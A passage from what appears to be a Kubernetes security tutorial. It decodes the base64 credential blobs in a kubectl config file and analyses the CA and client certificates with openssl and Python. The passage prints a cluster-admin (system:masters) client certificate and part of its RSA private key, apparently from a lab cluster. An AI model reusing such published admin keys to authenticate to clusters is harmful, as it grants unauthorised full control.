J1b2d0dmFaCjVNS3JiVHg4QnpjRGhIMDFGdEtBM1VycGFTTU9vN3h2blVUTnM0OENnWUVBa05DbGRWN2J2MkpEOFkwTnRYZG4KMUwxN3g3aUdBdTVWenoxeE05VHdxN09aQnh0b0VSc0wyWFFtSk9YcldJSzZiaTJseENEWWkvYzAwY0hHU2lmSQo0RDZIb3VzRlFOMmlhaUcyZ2p0b0lSR2lYZ1NTaURaU0Z6amh4NE4wUWdRRTRKVHdGeDQydDJITTFsK2lYb25oClQraHhWVTMvVW9ydEVzb2c3cW9YTEVzQ2dZQkt4ek9JTVpUZkFRSnJsSENGRXpQMDdXRGMrcVJ6dHc2SzJmU0YKd3RXTURtRDc5bENrU0xCdCtVcCtxY3NnNTJ1T2o1azBHWlJwWmNWKzYzazBZT3JuSXByWTNvQkJLTjN2c0hjcApDM0g5M2hMTE92OUUyaEJ1dS9naEgrbnpkelB6UFhrK2FFOFZiME5qcEF1UERWL0l1VkNkY1JJSmt1aGl2WnQ1ClJYQ084d0tCZ0NFVGU1bm9xMFRHL2xVSFRnYVU0L3lBdi8rZjc5azlTOWw4a2xxR2RPSnBZZVZRVHdvSjZ1b1oKRndUMGhXYXdjK3NSWXRGeGxYMUhzV2huWmNLbVg3OGxJM2pLRDFwYXVrZURhVjFzQ0p4QnlIWVVSOXN2aWM5ZgplektZVHdCS1NLN2NPaTVPNFlPV3J1N255TTVXdEhHN25CVngxNmJTaHJRL2Nzc3A3UWVxCi0tLS0tRU5EIFJTQSBQUklWQVRFIEtFWS0tLS0tCg==
</code></pre></div></div>
<p>Of note in this file are an external location for the API server in the <code class="language-plaintext highlighter-rouge">server</code> field (https://kubemaster.thezoo.local:6443) and a number of base64 blobs of data labelled as <code class="language-plaintext highlighter-rouge">certificate-authority-data</code>, <code class="language-plaintext highlighter-rouge">client-certificate-data</code> and <code class="language-plaintext highlighter-rouge">client-key-data</code>. Let’s extract these blobs to disk and take a closer look at them.</p>
<h2 id="analysing-authentication-data-from-the-kubectl-config-file">Analysing authentication data from the kubectl config file</h2>
<p>First let’s create a working directory for the files we will be analysing and change to it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~$ mkdir certs
stephen@kubemaster:~$ cd certs
</code></pre></div></div>
<p>Now let’s decode and dump to disk the first blob, for <code class="language-plaintext highlighter-rouge">certificate-authority-data</code>, and see what’s in it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ echo 'LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURCVENDQWUyZ0F3SUJBZ0lJQnk2S2RmS2tRM2d3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHpNekV4TURVd01USTFORFphTUJVeApFekFSQmdOVkJBTVRDbXQxWW1WeWJtVjBaWE13Z2dFaU1BMEdDU3FHU0liM0RRRUJBUVVBQTRJQkR3QXdnZ0VLCkFvSUJBUUMrbFVpOGNIZFViY2JIVWJGWTJmQ1d4UTQrT245alY0aXNxWGV1eXNEK2h2VDRQYVk5VE0vT3pPd1AKT0ExWW15aFNUckFEbFMrampxZngvTzczY0UxNVN3NUpvVzNKeVRtbW84c3AxRThPREIwVTdZdE9WaXJSQk1lbgpsa0pTS1A5Qk1UTU5hSW5FYkgvOHpQNUkvWTVsY0lWR3k2YjFCWXNHLysvQndqNGJBUGdtN1pRZmtoa3lxWTJqCmp4Y1VoMC9INWJVRlhlRmR5RmhocXhJdkhhRHNLRzViaFZIUkVtdUxTSnNvVEc4eWdEL2kzbmh0a3hGMEtIeGoKQTErUUtkRGphVFlham5hY25aMmpHK0FGRU5NQzJOWXczckFNWC9QNTROcDZQOUprdWtDUytYSzJsQ3ZiM1BJcQpTYWRNSWorbElUVGplemJnY3cyY3YyQSs2QjVEQWdNQkFBR2pXVEJYTUE0R0ExVWREd0VCL3dRRUF3SUNwREFQCkJnTlZIUk1CQWY4RUJUQURBUUgvTUIwR0ExVWREZ1FXQkJUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRW5EQVYKQmdOVkhSRUVEakFNZ2dwcmRXSmxjbTVsZEdWek1BMEdDU3FHU0liM0RRRUJDd1VBQTRJQkFRQVVqUmlhWGZRTgphRTQ1VmN3NTIvYlhldi83WlpxN05kL2s4Q0Z5Z0tOcjJybWlOUWNJa0k3MXF2SUxEeEZoT3NOVWhhSVRHUU5aCmRZT2ZnN0Q5NzZhZ24xSHRjQUFtOUlJRUFpaG51OVNMWFc0c1F2WHBXWEcrelNOemQyMUpES0QvWXlyMm5DVE0KKzZqTVNRYmw5Z0dPalhDdUVTNGY3anlqRXRVREh5dHRpQ3hSRFVuelNvcG9ybEc4ai94emhQOGlaSEN6UlZHUAppbjlhL2lFeDlSZUNOcm5zS1NIN0p1QWZYMFl6TEFBSng1SldBNGozcW9JMmJQZ0F2L25hVU9pSmNrWVpUdWtzCndkQnJURFJUOGtycThKZ2NCTEJEa1Y2blVENDUrbGxIQUI4R3VuSFhkdElYdzR0S3RCdUxneGs0NEtVUUpkb3YKeHdmNXJ0dmZWajY2Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K' | base64 -d > ca.crt
stephen@kubemaster:~/certs$ cat ca.crt
-----BEGIN CERTIFICATE-----
MIIDBTCCAe2gAwIBAgIIBy6KdfKkQ3gwDQYJKoZIhvcNAQELBQAwFTETMBEGA1UE
AxMKa3ViZXJuZXRlczAeFw0yMzExMDgwMTIwNDZaFw0zMzExMDUwMTI1NDZaMBUx
EzARBgNVBAMTCmt1YmVybmV0ZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
AoIBAQC+lUi8cHdUbcbHUbFY2fCWxQ4+On9jV4isqXeuysD+hvT4PaY9TM/OzOwP
OA1YmyhSTrADlS+jjqfx/O73cE15Sw5JoW3JyTmmo8sp1E8ODB0U7YtOVirRBMen
lkJSKP9BMTMNaInEbH/8zP5I/Y5lcIVGy6b1BYsG/+/Bwj4bAPgm7ZQfkhkyqY2j
jxcUh0/H5bUFXeFdyFhhqxIvHaDsKG5bhVHREmuLSJsoTG8ygD/i3nhtkxF0KHxj
A1+QKdDjaTYajnacnZ2jG+AFENMC2NYw3rAMX/P54Np6P9JkukCS+XK2lCvb3PIq
SadMIj+lITTjezbgcw2cv2A+6B5DAgMBAAGjWTBXMA4GA1UdDwEB/wQEAwICpDAP
BgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgYbD4N8i7PgpS7OKuEb5xlEHEnDAV
BgNVHREEDjAMggprdWJlcm5ldGVzMA0GCSqGSIb3DQEBCwUAA4IBAQAUjRiaXfQN
aE45Vcw52/bXev/7ZZq7Nd/k8CFygKNr2rmiNQcIkI71qvILDxFhOsNUhaITGQNZ
dYOfg7D976agn1HtcAAm9IIEAihnu9SLXW4sQvXpWXG+zSNzd21JDKD/Yyr2nCTM
+6jMSQbl9gGOjXCuES4f7jyjEtUDHyttiCxRDUnzSoporlG8j/xzhP8iZHCzRVGP
in9a/iEx9ReCNrnsKSH7JuAfX0YzLAAJx5JWA4j3qoI2bPgAv/naUOiJckYZTuks
wdBrTDRT8krq8JgcBLBDkV6nUD45+llHAB8GunHXdtIXw4tKtBuLgxk44KUQJdov
xwf5rtvfVj66
-----END CERTIFICATE-----
</code></pre></div></div>
<p>This looks like a PEM encoded X.509 certificate. Let’s parse it using openssl to try and understand what its purpose is.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl x509 -in ca.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 517503246380843896 (0x72e8a75f2a44378)
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = kubernetes
Validity
Not Before: Nov 8 01:20:46 2023 GMT
Not After : Nov 5 01:25:46 2033 GMT
Subject: CN = kubernetes
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:be:95:48:bc:70:77:54:6d:c6:c7:51:b1:58:d9:
f0:96:c5:0e:3e:3a:7f:63:57:88:ac:a9:77:ae:ca:
c0:fe:86:f4:f8:3d:a6:3d:4c:cf:ce:cc:ec:0f:38:
0d:58:9b:28:52:4e:b0:03:95:2f:a3:8e:a7:f1:fc:
ee:f7:70:4d:79:4b:0e:49:a1:6d:c9:c9:39:a6:a3:
cb:29:d4:4f:0e:0c:1d:14:ed:8b:4e:56:2a:d1:04:
c7:a7:96:42:52:28:ff:41:31:33:0d:68:89:c4:6c:
7f:fc:cc:fe:48:fd:8e:65:70:85:46:cb:a6:f5:05:
8b:06:ff:ef:c1:c2:3e:1b:00:f8:26:ed:94:1f:92:
19:32:a9:8d:a3:8f:17:14:87:4f:c7:e5:b5:05:5d:
e1:5d:c8:58:61:ab:12:2f:1d:a0:ec:28:6e:5b:85:
51:d1:12:6b:8b:48:9b:28:4c:6f:32:80:3f:e2:de:
78:6d:93:11:74:28:7c:63:03:5f:90:29:d0:e3:69:
36:1a:8e:76:9c:9d:9d:a3:1b:e0:05:10:d3:02:d8:
d6:30:de:b0:0c:5f:f3:f9:e0:da:7a:3f:d2:64:ba:
40:92:f9:72:b6:94:2b:db:dc:f2:2a:49:a7:4c:22:
3f:a5:21:34:e3:7b:36:e0:73:0d:9c:bf:60:3e:e8:
1e:43
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment, Certificate Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C
X509v3 Subject Alternative Name:
DNS:kubernetes
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
14:8d:18:9a:5d:f4:0d:68:4e:39:55:cc:39:db:f6:d7:7a:ff:
fb:65:9a:bb:35:df:e4:f0:21:72:80:a3:6b:da:b9:a2:35:07:
08:90:8e:f5:aa:f2:0b:0f:11:61:3a:c3:54:85:a2:13:19:03:
59:75:83:9f:83:b0:fd:ef:a6:a0:9f:51:ed:70:00:26:f4:82:
04:02:28:67:bb:d4:8b:5d:6e:2c:42:f5:e9:59:71:be:cd:23:
73:77:6d:49:0c:a0:ff:63:2a:f6:9c:24:cc:fb:a8:cc:49:06:
e5:f6:01:8e:8d:70:ae:11:2e:1f:ee:3c:a3:12:d5:03:1f:2b:
6d:88:2c:51:0d:49:f3:4a:8a:68:ae:51:bc:8f:fc:73:84:ff:
22:64:70:b3:45:51:8f:8a:7f:5a:fe:21:31:f5:17:82:36:b9:
ec:29:21:fb:26:e0:1f:5f:46:33:2c:00:09:c7:92:56:03:88:
f7:aa:82:36:6c:f8:00:bf:f9:da:50:e8:89:72:46:19:4e:e9:
2c:c1:d0:6b:4c:34:53:f2:4a:ea:f0:98:1c:04:b0:43:91:5e:
a7:50:3e:39:fa:59:47:00:1f:06:ba:71:d7:76:d2:17:c3:8b:
4a:b4:1b:8b:83:19:38:e0:a5:10:25:da:2f:c7:07:f9:ae:db:
df:56:3e:ba
</code></pre></div></div>
<p>There are a number of interesting features here. Let’s list out some of the more important ones and discuss their meaning:</p>
<ul>
<li><strong>X509v3 Basic Constraints</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CA:TRUE</code> which identifies the certificate as a Certificate Authority - a certificate used to verify the trustworthiness of other certificates.</li>
<li><strong>Subject</strong> - This has the value <code class="language-plaintext highlighter-rouge">CN = kubernetes</code>, which names the entity that the certificate represents.</li>
<li><strong>Issuer</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CN = kubernetes</code>, which names the entity that issued the certificate. The fact this value matches the <strong>Subject</strong> suggests the certificate is self issued, a root CA.</li>
<li><strong>X509v3 Key Usage</strong> - Which contains the values <code class="language-plaintext highlighter-rouge">Digital Signature, Key Encipherment, Certificate Sign</code>, which lists the purposes for which the certificate is intended to be used.</li>
<li><strong>X509v3 Subject Key Identifier</strong> - Which has the value <code class="language-plaintext highlighter-rouge">E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C</code>, which uniquely identifies the cryptographic key associated with the certificate.</li>
</ul>
<p>So from this, we know that this certificate is used to verify other certificates used within “kubernetes”, and we have the unique identifier of the key whose signatures will be used to verify this association.</p>
<p>These will become relevant later.</p>
<p>The fact that the Subject and Issuer match and that there is no Authority Key Identifier also suggests that this is a root CA - the start of its own chain of trust. We can confirm this by trying to verify the authenticity of the certificate using its own included public key with openssl, like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl verify -verbose -CAfile ca.crt ca.crt
ca.crt: OK
</code></pre></div></div>
<p>This verifies that this certificate is a self signed root CA.</p>
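<p>As an aside, the same self signature check can be sketched in Python with the <code class="language-plaintext highlighter-rouge">cryptography</code> library, verifying the certificate’s signature with its own embedded public key:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Sketch: verify ca.crt's signature using its own public key
from cryptography import x509
from cryptography.hazmat.primitives.asymmetric import padding

ca = x509.load_pem_x509_certificate(open('ca.crt', 'rb').read())

# verify() raises InvalidSignature if the check fails
ca.public_key().verify(
    ca.signature,                 # signature value from the certificate
    ca.tbs_certificate_bytes,     # the signed portion of the certificate
    padding.PKCS1v15(),
    ca.signature_hash_algorithm,  # SHA-256 in this case
)
print('self-signature OK')
</code></pre></div></div>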
<p>Now let’s look at the blob from <code class="language-plaintext highlighter-rouge">client-certificate-data</code> in the same manner.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ echo 'LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURJVENDQWdtZ0F3SUJBZ0lJV28rZ1plVWE3dzR3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB5TXpFeE1EZ3dNVEl3TkRaYUZ3MHlOREV4TURjd01USTFORGRhTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQXloQjFlR2JmNjBUUjE5RmYKUVdYb1VmTFVNWUFERnUydDBrL1ZUbDNSYzN6VVU0bjlvYU9VME5EQ1psNzIxK3Z4RS9ISnZxdnIrTDkzbHBWTwpnRVo3dytXT1MyN2ViL2Nrd0pwYlRheHB2WGYxdFlqNm9ub1lGSUNuWTlCMGE2SG91dC9hZ1UzQUtSRmNTK0NGCkVKVU9udnkrOHF0Y1luT2RBR2Jpd1ZieXJDWlNsVVVQMnZvOWNpcC9hUUJsSk96NEs4bTlSa3hoUjFBV3FUdU4KQkRMWTVMUlN1SHNOWTRnTk8yankzcU5qUjBxS0RFZ29IMmhKUnFmR3M4ZWdMVFM3OVBMdnFkbHJ2di8waHdUWQp1UXVoNWZOWW5SRkZwR1RreFR1b2wvNWNBWmlnQkRraUtrR0c2UFR2R2tiRWd6QTNveDZIckljcFZNSHpEdzRRCjhUOEVMUUlEQVFBQm8xWXdWREFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RBWURWUjBUQVFIL0JBSXdBREFmQmdOVkhTTUVHREFXZ0JUZ1liRDROOGk3UGdwUzdPS3VFYjV4bEVIRQpuREFOQmdrcWhraUc5dzBCQVFzRkFBT0NBUUVBbmNuVnBDYUg5ck9GQkExMW5DalhISzAwRG13R1FJZnpjV2x0CkJ3RzRwR2lTK0RRR3ltODFwVEtHblhTQU1UZENvVmI2QzlrdWMrWkR0bG5iL05xZUk2WHpnVjdVbXp2V0E0N0gKSThvSHl5V3RjY1pNcUNwOTNnZUJDb3lZdW42SkpnTVozbHJhRTN6U1hxU0xzQ0hZWXpJZlRLWnFRdFFhbnBaNAp3SUVIMlBtZ1FxMmR4bmtoak9JSWF0bm54U0owdno1MDlXQVBQOStrSEpVeUh2N1V0a0pDL2J3aE5SdDh1RmluClBsN3Z3NGRUY1p4dS81SHlqcnlRcUVKUFBHS2ZnRlBja0dyclBXL1I1bUJHclVxRlZqYXN0TGQzekNMNG1GT0UKUWdyOTNMajh2ZnA1dFQrbFljRUkrYit3czdJaWFUQW9OdktVQXd4bXFmVzl2L1ZyZFE9PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==' | base64 -d > client.crt
stephen@kubemaster:~/certs$ cat client.crt
-----BEGIN CERTIFICATE-----
MIIDITCCAgmgAwIBAgIIWo+gZeUa7w4wDQYJKoZIhvcNAQELBQAwFTETMBEGA1UE
AxMKa3ViZXJuZXRlczAeFw0yMzExMDgwMTIwNDZaFw0yNDExMDcwMTI1NDdaMDQx
FzAVBgNVBAoTDnN5c3RlbTptYXN0ZXJzMRkwFwYDVQQDExBrdWJlcm5ldGVzLWFk
bWluMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyhB1eGbf60TR19Ff
QWXoUfLUMYADFu2t0k/VTl3Rc3zUU4n9oaOU0NDCZl721+vxE/HJvqvr+L93lpVO
gEZ7w+WOS27eb/ckwJpbTaxpvXf1tYj6onoYFICnY9B0a6Hout/agU3AKRFcS+CF
EJUOnvy+8qtcYnOdAGbiwVbyrCZSlUUP2vo9cip/aQBlJOz4K8m9RkxhR1AWqTuN
BDLY5LRSuHsNY4gNO2jy3qNjR0qKDEgoH2hJRqfGs8egLTS79PLvqdlrvv/0hwTY
uQuh5fNYnRFFpGTkxTuol/5cAZigBDkiKkGG6PTvGkbEgzA3ox6HrIcpVMHzDw4Q
8T8ELQIDAQABo1YwVDAOBgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUH
AwIwDAYDVR0TAQH/BAIwADAfBgNVHSMEGDAWgBTgYbD4N8i7PgpS7OKuEb5xlEHE
nDANBgkqhkiG9w0BAQsFAAOCAQEAncnVpCaH9rOFBA11nCjXHK00DmwGQIfzcWlt
BwG4pGiS+DQGym81pTKGnXSAMTdCoVb6C9kuc+ZDtlnb/NqeI6XzgV7UmzvWA47H
I8oHyyWtccZMqCp93geBCoyYun6JJgMZ3lraE3zSXqSLsCHYYzIfTKZqQtQanpZ4
wIEH2PmgQq2dxnkhjOIIatnnxSJ0vz509WAPP9+kHJUyHv7UtkJC/bwhNRt8uFin
Pl7vw4dTcZxu/5HyjryQqEJPPGKfgFPckGrrPW/R5mBGrUqFVjastLd3zCL4mFOE
Qgr93Lj8vfp5tT+lYcEI+b+ws7IiaTAoNvKUAwxmqfW9v/VrdQ==
-----END CERTIFICATE-----
</code></pre></div></div>
<p>Another certificate. Let’s parse it with openssl again.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl x509 -in client.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 6525610744579026702 (0x5a8fa065e51aef0e)
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = kubernetes
Validity
Not Before: Nov 8 01:20:46 2023 GMT
Not After : Nov 7 01:25:47 2024 GMT
Subject: O = system:masters, CN = kubernetes-admin
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:ca:10:75:78:66:df:eb:44:d1:d7:d1:5f:41:65:
e8:51:f2:d4:31:80:03:16:ed:ad:d2:4f:d5:4e:5d:
d1:73:7c:d4:53:89:fd:a1:a3:94:d0:d0:c2:66:5e:
f6:d7:eb:f1:13:f1:c9:be:ab:eb:f8:bf:77:96:95:
4e:80:46:7b:c3:e5:8e:4b:6e:de:6f:f7:24:c0:9a:
5b:4d:ac:69:bd:77:f5:b5:88:fa:a2:7a:18:14:80:
a7:63:d0:74:6b:a1:e8:ba:df:da:81:4d:c0:29:11:
5c:4b:e0:85:10:95:0e:9e:fc:be:f2:ab:5c:62:73:
9d:00:66:e2:c1:56:f2:ac:26:52:95:45:0f:da:fa:
3d:72:2a:7f:69:00:65:24:ec:f8:2b:c9:bd:46:4c:
61:47:50:16:a9:3b:8d:04:32:d8:e4:b4:52:b8:7b:
0d:63:88:0d:3b:68:f2:de:a3:63:47:4a:8a:0c:48:
28:1f:68:49:46:a7:c6:b3:c7:a0:2d:34:bb:f4:f2:
ef:a9:d9:6b:be:ff:f4:87:04:d8:b9:0b:a1:e5:f3:
58:9d:11:45:a4:64:e4:c5:3b:a8:97:fe:5c:01:98:
a0:04:39:22:2a:41:86:e8:f4:ef:1a:46:c4:83:30:
37:a3:1e:87:ac:87:29:54:c1:f3:0f:0e:10:f1:3f:
04:2d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Authority Key Identifier:
E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
9d:c9:d5:a4:26:87:f6:b3:85:04:0d:75:9c:28:d7:1c:ad:34:
0e:6c:06:40:87:f3:71:69:6d:07:01:b8:a4:68:92:f8:34:06:
ca:6f:35:a5:32:86:9d:74:80:31:37:42:a1:56:fa:0b:d9:2e:
73:e6:43:b6:59:db:fc:da:9e:23:a5:f3:81:5e:d4:9b:3b:d6:
03:8e:c7:23:ca:07:cb:25:ad:71:c6:4c:a8:2a:7d:de:07:81:
0a:8c:98:ba:7e:89:26:03:19:de:5a:da:13:7c:d2:5e:a4:8b:
b0:21:d8:63:32:1f:4c:a6:6a:42:d4:1a:9e:96:78:c0:81:07:
d8:f9:a0:42:ad:9d:c6:79:21:8c:e2:08:6a:d9:e7:c5:22:74:
bf:3e:74:f5:60:0f:3f:df:a4:1c:95:32:1e:fe:d4:b6:42:42:
fd:bc:21:35:1b:7c:b8:58:a7:3e:5e:ef:c3:87:53:71:9c:6e:
ff:91:f2:8e:bc:90:a8:42:4f:3c:62:9f:80:53:dc:90:6a:eb:
3d:6f:d1:e6:60:46:ad:4a:85:56:36:ac:b4:b7:77:cc:22:f8:
98:53:84:42:0a:fd:dc:b8:fc:bd:fa:79:b5:3f:a5:61:c1:08:
f9:bf:b0:b3:b2:22:69:30:28:36:f2:94:03:0c:66:a9:f5:bd:
bf:f5:6b:75
</code></pre></div></div>
<p>Let’s examine some of the relevant fields again.</p>
<ul>
<li><strong>X509v3 Basic Constraints</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CA:FALSE</code> which identifies that the certificate is NOT a Certificate Authority.</li>
<li><strong>Subject</strong> - This has the value <code class="language-plaintext highlighter-rouge">O = system:masters, CN = kubernetes-admin</code>, which names the entity that the certificate represents. We will talk about the significance of the values later.</li>
<li><strong>Issuer</strong> - This contains the value <code class="language-plaintext highlighter-rouge">CN = kubernetes</code>, which names the entity that issued the certificate. It matches the <strong>Subject</strong> from the previous certificate, suggesting (but not proving) the previous certificate signed this one.</li>
<li><strong>X509v3 Authority Key Identifier</strong> - Which has the value <code class="language-plaintext highlighter-rouge">E0:61:B0:F8:37:C8:BB:3E:0A:52:EC:E2:AE:11:BE:71:94:41:C4:9C</code>, which uniquely identifies the key pair (public+private key) associated with the certificate that issued this certificate. It matches the <strong>X509v3 Subject Key Identifier</strong> value from the previous certificate, suggesting (but again not proving) that certificate signed this one.</li>
<li><strong>X509v3 Extended Key Usage</strong> - Which contains the value <code class="language-plaintext highlighter-rouge">TLS Web Client Authentication</code>, which lists the “extended” purpose for which the certificate is intended to be used. This refers to a certificate used for TLS client authentication - the relatively uncommon use case where the client in a TLS session uses a certificate to identify itself to the server, as opposed to the more common scenario where only the server presents an identifying certificate.</li>
</ul>
<p>These fields suggest that this certificate was issued by the first CA certificate we examined, but we don’t know this for sure unless we can confirm that the private key associated with the first certificate was used to sign this certificate. This can be done using openssl again.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ openssl verify -verbose -CAfile ca.crt client.crt
client.crt: OK
</code></pre></div></div>
<p>This verifies that this certificate was issued by the first CA certificate - it is part of its chain of trust.</p>
<p>Let’s now examine the final blob named <code class="language-plaintext highlighter-rouge">client-key-data</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubemaster:~/certs$ echo 'LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb3dJQkFBS0NBUUVBeWhCMWVHYmY2MFRSMTlGZlFXWG9VZkxVTVlBREZ1MnQway9WVGwzUmMzelVVNG45Cm9hT1UwTkRDWmw3MjErdnhFL0hKdnF2citMOTNscFZPZ0VaN3crV09TMjdlYi9ja3dKcGJUYXhwdlhmMXRZajYKb25vWUZJQ25ZOUIwYTZIb3V0L2FnVTNBS1JGY1MrQ0ZFSlVPbnZ5KzhxdGNZbk9kQUdiaXdWYnlyQ1pTbFVVUAoydm85Y2lwL2FRQmxKT3o0SzhtOVJreGhSMUFXcVR1TkJETFk1TFJTdUhzTlk0Z05PMmp5M3FOalIwcUtERWdvCkgyaEpScWZHczhlZ0xUUzc5UEx2cWRscnZ2LzBod1RZdVF1aDVmTlluUkZGcEdUa3hUdW9sLzVjQVppZ0JEa2kKS2tHRzZQVHZHa2JFZ3pBM294NkhySWNwVk1IekR3NFE4VDhFTFFJREFRQUJBb0lCQURpZmhodVlVSFZBVXNGMApwWW5SQWRvOC91TmtLUGw2M3pQSk5WQUJrRmtaaVBKai85UVUzL1hvR2lIUHlNSlhGclp0RWdqQmFwM0pJYnpyCjJCU3dLNnlJbm1oYkNEQStCR21JbDc5YmFrSXk1SUxiZ01pWkNEaHVtUG1xaDRWRjJNN05QaER2OWNKTVlCM1AKSzlxcXVtOHBDbVU4U2VZNDJhMHNKNnpnTFo2NW12L1pwVWJrRDVXMGtFckNtcldWYXBrb0dHUzMraEVmZ0xuVQo3WmkwWmQxSm04RFpBcVBaZjB2K2xEcTRRNlA2cFRyWkZhSHRKeXE1R3BaaG5LdzFRSVAvZDM4SkdrWmJ2bDZTCmdLdWREZHR3UWtLWDhFc3hzUElzcHFYWmlJRnRHbEd4UjNWT3lSaXo1WlIvTDVQUDYvSHZ5QjZVMVMzU0MydW0KMGc1TW9xMENnWUVBNVA3K3J6Yjh0WkFQQzdMdTAwcm5CeUZLVWoyWUVKU3hwLy8wREtuWGtmcTZ2a01wZmo1TwpRNC8vcVJxMFBsTXlIbFF3dFpkVXdmb0Raem1tSUZGYkNucDhoYWl5Z3JVMldVZjRkc0Y4ZVExN0NPVHhURGkzCndqL3Z5MXNtaUw2OEVIMjNNeW94YitXamRaZUJKQVRSS05pWDFvbHFFUE5xVlRrd21TZkl2b01DZ1lFQTRlUncKWUNpKytqUnVwTEMzb0FvYzZWTU9zZllJdkhhTG5iQkx0SVVZWnFpaU5Namp1UHJnSE0vcnRCc3BPYmhWSCtpdQpOZ0YrS2pMa1ZsY0Rxd1NuQ20vcEdoVCtXeFhVdjNpRjRHSWQ5cm5iYVhRbklIbzNLWk56VzRKWDJ1b2d0dmFaCjVNS3JiVHg4QnpjRGhIMDFGdEtBM1VycGFTTU9vN3h2blVUTnM0OENnWUVBa05DbGRWN2J2MkpEOFkwTnRYZG4KMUwxN3g3aUdBdTVWenoxeE05VHdxN09aQnh0b0VSc0wyWFFtSk9YcldJSzZiaTJseENEWWkvYzAwY0hHU2lmSQo0RDZIb3VzRlFOMmlhaUcyZ2p0b0lSR2lYZ1NTaURaU0Z6amh4NE4wUWdRRTRKVHdGeDQydDJITTFsK2lYb25oClQraHhWVTMvVW9ydEVzb2c3cW9YTEVzQ2dZQkt4ek9JTVpUZkFRSnJsSENGRXpQMDdXRGMrcVJ6dHc2SzJmU0YKd3RXTURtRDc5bENrU0xCdCtVcCtxY3NnNTJ1T2o1azBHWlJwWmNWKzYzazBZT3JuSXByWTNvQkJLTjN2c0hjcApDM0g5M2hMTE92OUUyaEJ1dS9naEgrbnpkelB6UFhrK2FFOFZiME5qcEF1UERWL0l1VkNkY1JJSmt1aGl2WnQ1ClJYQ084d0tCZ0NFVGU1bm9xMFRHL2xVSFRnYVU0L3lBdi8rZjc5azlTOWw4a2xxR2RPSnBZZVZRVHdvSjZ1b1oKRndUMGhXYXdjK3NSWXRGeGxYMUhzV2huWmNLbVg3OGxJM2pLRDFwYXVrZURhVjFzQ0p4QnlIWVVSOXN2aWM5ZgplektZVHdCS1NLN2NPaTVPNFlPV3J1N255TTVXdEhHN25CVngxNmJTaHJRL2Nzc3A3UWVxCi0tLS0tRU5EIFJTQSBQUklWQVRFIEtFWS0tLS0tCg==' | base64 -d > client.key
(crypto) stephen@kubemaster:~/certs$ cat client.key
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAyhB1eGbf60TR19FfQWXoUfLUMYADFu2t0k/VTl3Rc3zUU4n9
oaOU0NDCZl721+vxE/HJvqvr+L93lpVOgEZ7w+WOS27eb/ckwJpbTaxpvXf1tYj6
onoYFICnY9B0a6Hout/agU3AKRFcS+CFEJUOnvy+8qtcYnOdAGbiwVbyrCZSlUUP
2vo9cip/aQBlJOz4K8m9RkxhR1AWqTuNBDLY5LRSuHsNY4gNO2jy3qNjR0qKDEgo
